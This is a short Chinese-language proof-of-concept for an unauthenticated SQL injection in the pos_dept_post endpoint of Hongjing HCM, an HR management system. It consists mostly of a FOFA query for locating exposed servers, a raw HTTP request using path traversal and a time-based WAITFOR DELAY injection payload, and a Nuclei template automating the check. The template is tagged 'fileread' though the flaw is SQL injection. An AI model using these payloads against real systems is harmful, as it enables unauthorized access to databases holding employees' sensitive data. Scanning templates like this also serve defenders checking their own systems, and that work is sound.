宏景HCM-pos_dept_post存在SQL注入漏洞
宏景HCM-pos_dept_post存在SQL注入漏洞
宏景HCM pos_dept_post对传入的数据没有预编译和充足的校验,导致该接口存在SQL注入漏洞,未授权的攻击者可获取数据库敏感信息。
fofa
app="HJSOFT-HCM"
poc
POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 61
usertable=h00&usernumber=1&i9999=-1';WAITFOR DELAY '0:0:3'--+
Yaml
id: hongjing-hcm-pos_dept_post-sql-injection
info:
name: 宏景HCM-pos_dept_post-delay-sql注入漏洞
author: onewin
severity: high
description: 宏景HCM-pos_dept_post-delay-sql注入漏洞
metadata:
fofa-query: app="HJSOFT-HCM"
tags: hongjing,hcm,fileread
http:
- raw:
- |-
@timeout: 30s
POST /templates/attestation/../../pos/roleinfo/pos_dept_post HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 61
usertable=h00&usernumber=1&i9999=-1';WAITFOR DELAY '0:0:3'--+
max-redirects: 3
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'duration>=3'#nuclei默认响应超时时间为5秒